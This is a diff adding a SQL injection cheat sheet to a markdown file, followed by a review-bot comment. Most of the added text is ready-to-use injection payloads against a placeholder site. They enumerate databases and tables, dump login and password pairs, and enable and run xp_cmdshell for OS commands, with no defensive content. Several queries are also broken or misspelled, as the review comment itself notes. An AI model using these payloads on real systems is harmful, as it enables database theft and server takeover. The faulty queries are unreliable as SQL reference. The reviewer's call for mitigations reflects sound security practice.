    SQL Injection.md
    1  -# Soon!
     1 +# SQL injection
     2 + 
     3 +## Introduction
     4 +It is an attack in which an attacker inserts untrusted data in the application that results in revealing sensitive information of the database.
     5 + 
     6 +SQL Injection (SQLi) is a code injection attack where an attacker manipulates the data being sent to the server to execute malicious SQL statements to control a web application’s database server, thereby accessing, modifying and deleting unauthorized data. This attack is mainly used to take over database servers.
     7 + 
     8 +- In-band SQLi (Classic SQLi)
     9 +- Error-based SQLi
     10 +- Union-based SQLi
     11 +- Inferential SQLi (Blind SQLi)
     12 +- Boolean-based (content-based) Blind SQLi
     13 +- Time-based Blind SQLi
     14 +- Out-of-band SQLi
     15 + 
     16 +## How to exploit
     17 +# SQLI tricks
     18 + 
     19 +## GET
     20 + 
     21 +### Error-Based
     22 + 
     23 +### Simple test
     24 + 
     25 +`Adding a simpe quote '`
     26 + 
     27 +Example: `http://vulnerable-website.com/Less-1/?id=5'`
     28 + 
     29 +### Fuzzing
     30 + 
     31 +Sorting columns to find maximum column
     32 + 
     33 +`http://vulnerable-website.com/Less-1/?id=-1 order by 1`
     34 + 
     35 +`http://vulnerable-website.com/Less-1/?id=-1 order by 2`
     36 + 
     37 +`http://vulnerable-website.com/Less-1/?id=-1 order by 3`
     38 + 
     39 +(until it stop returning errors)
     40 + 
     41 +---
     42 + 
     43 + 
     44 +### Finding what column is injectable
     45 + 
     46 +**mysql**
     47 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, 3` (using the same amount of columns you got on the previous step)
     48 + 
     49 +**postgresql**
     50 +`http://vulnerable-website.com/Less-1/?id=-1 union select NULL, NULL, NULL` (using the same amount of columns you got on the previous step)
     51 + 
     52 + one of the columns will be printed with the respective number
     53 + 
     54 +---
     55 + 
     56 + 
     57 +#### Finding version
     58 + 
     59 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, version()` **mysql**
     60 +`http://vulnerable-website.com/Less-1/?id=-1 union select NULL, NULL, version()` **postgres**s
     61 + 
     62 + 
     63 +#### Finding database name
     64 + 
     65 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1,2, database()` **mysql**
     66 + 
     67 +`http://vulnerable-website.com/Less-1/?id=-1 union select NULL,NULL, database()` **postgres**
     68 + 
     69 + 
     70 +#### Finding usernames logged in
     71 + 
     72 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, current_user()` **mysql**
     73 + 
     74 + 
     75 +#### Finding databases
     76 + 
     77 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, schema_name from information_schema.schemata` **mysql**
     78 + 
     79 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, datname from pg_database` **postgres**
     80 + 
     81 + 
     82 +#### Finding table names from a database
     83 + 
     84 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, table_name from information_schema.tables where table_schema="database_name"` **mysql**
     85 + 
     86 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, tablename from pg_tables where table_catalog="database_name"` **postgres**
     87 + 
     88 + 
     89 +#### Finding column names from a table
     90 + 
     91 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_schema="database_name" and table_name="tablename"` **mysql**
     92 + 
     93 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_catalog="database_name" and table_name="tablename"` **postgres**
     94 + 
     95 +#### Concatenate
     96 + 
     97 +Example:
     98 + 
     99 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, login from users;`
     100 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, password from users;`
     101 + 
     102 +in one query
     103 + 
     104 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, concat(login,':',password) from users;` **mysql**
     105 +`http://vulnerable-website.com/Less-1/?id=-1 union select 1, 2, login||':'||password from users;` **postgres**
     106 + 
     107 + 
     108 +### Error Based SQLI (USUALLY MS-SQL)
     109 + 
     110 +#### Current user
     111 + 
     112 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))--`
     113 + 
     114 + 
     115 +#### DBMS version
     116 + 
     117 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--`
     118 + 
     119 + 
     120 +#### Database name
     121 + 
     122 +`http://vulnerable-website.com/Less-1/?id=-1 or db_name(0)=0 --`
     123 + 
     124 + 
     125 +#### Tables from a database
     126 + 
     127 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U')--`
     128 + 
     129 +---
     130 + 
     131 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT IN ('previouslyFoundTable',...))--`
     132 + 
     133 + 
     134 +#### Columns within a table
     135 + 
     136 + 
     137 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename')--`
     138 + 
     139 +> remember to change **dbname** and **tablename** accordingly with the given situation
     140 +> after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample
     141 + 
     142 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename' AND dbname..syscolumns.name NOT IN('previously found column name', ...))--`
     143 + 
     144 + 
     145 +#### Actual data
     146 + 
     147 + 
     148 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename)--`
     149 + 
     150 +> after each iteration a new column name will be found, make sure add it to ** previously found column name ** separated by comma as on the next sample
     151 + 
     152 +`http://vulnerable-website.com/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename AND name NOT IN('previously found row data'))--`
     153 + 
     154 + 
     155 +#### Shell commands
     156 + 
     157 +`EXEC master..xp_cmdshell <command>`
     158 + 
     159 +> you need yo be 'sa' user
     160 + 
     161 +#### Enabling shell commands
     162 + 
     163 +`EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_congigure 'xp_shell', 1; RECONFIGURE;`
     164 + 
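Review bot: several of the added queries are syntactically or semantically inconsistent and the document ends without any defensive guidance, so this should not merge as-is. Concretely: the PostgreSQL examples wrap string literals in double quotes (`table_schema="database_name"`, `table_catalog="database_name"`), which PostgreSQL parses as quoted identifiers, not strings; `pg_tables` has no `table_catalog` column; the "Actual data" example `FROM tablename AND name NOT IN(...)` is not valid SQL (a WHERE clause is missing and `name` is not the column being selected); the `union select 1, 2, 3` vs `NULL, NULL, NULL` split is labelled MySQL vs PostgreSQL, but the difference is about type compatibility of the UNION columns, not the DBMS; and "Finding usernames logged in" describes `current_user()`, which returns only the account the application connects as. Heading levels are inverted ("## How to exploit" followed by "# SQLI tricks"), and there are spelling errors ("simpe", "postgress", "yo be", "sp_congigure"). On the xp_cmdshell section, the note "you need to be 'sa' user" is imprecise: the procedure is disabled by default and requires membership in the sysadmin role, which is exactly why the database account an application uses should never hold it. Since the introduction defines the attack classes, please add a short mitigation section (parameterized queries or prepared statements, least-privilege database accounts, and keeping xp_cmdshell and "show advanced options" disabled) so the page reads as a reference rather than only a payload list.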